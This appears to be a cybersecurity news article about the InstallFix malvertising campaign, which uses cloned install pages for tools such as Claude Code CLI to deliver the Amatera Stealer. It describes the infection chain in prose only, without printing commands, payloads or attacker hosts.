A recent cybersecurity threat has emerged, leveraging cloned webpages of popular development tools to distribute malware, as reported by Push Security. This new attack variant, identified as InstallFix, is part of the broader ClickFix campaign and targets users by substituting genuine install commands with malicious ones on near-identical web pages.
Malvertising Tactics Exploited
The InstallFix campaign employs malvertising strategies to direct users to these deceptive yet convincing installation pages. A notable instance involves the abuse of interest in Anthropic’s Claude Code CLI tool. Threat actors have utilized Google Ads to increase the visibility of these cloned pages, ensuring they appear in sponsored search results, which significantly boosts their reach.
These counterfeit pages are crafted to replicate legitimate ones almost exactly. However, the install script embedded in these pages redirects users to an attacker-controlled server, which then deploys infostealing malware instead of the authentic Claude Code installation script.
Execution Chain and Malware Deployment
Upon executing the malicious installation command, the victim unknowingly triggers a sequence where cmd.exe launches mshta.exe. This process retrieves and executes malicious code from a remote server, culminating in the installation of the Amatera Stealer malware.
Push Security has observed that multiple sites are executing identical binaries, indicating a coordinated attack campaign. Legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne are being exploited to host these malicious payloads, effectively camouflaging them within normal web traffic.
Broader Implications for Development Tools
The campaign is not limited to Claude Code; any development tool or website with a high click potential and easy clonability can become a target. Threat actors have been found hosting malicious terminal commands on vulnerable public pages, distributing malware through clones of the Homebrew website and rogue GitHub repositories, and using NPM packages that mimic Claude Code.
Push Security emphasizes that this malvertising and impersonation tactic is a widespread issue, potentially affecting any tool or site that can be easily replicated. The cybersecurity community is urged to remain vigilant against such threats and ensure robust security measures are in place.
In related news, various cybersecurity threats continue to evolve, with attackers exploiting DNS lookups in ClickFix attacks, delivering infostealer malware via EmEditor supply chain attacks, and more. Staying informed and adopting proactive security strategies is crucial in combating these threats.
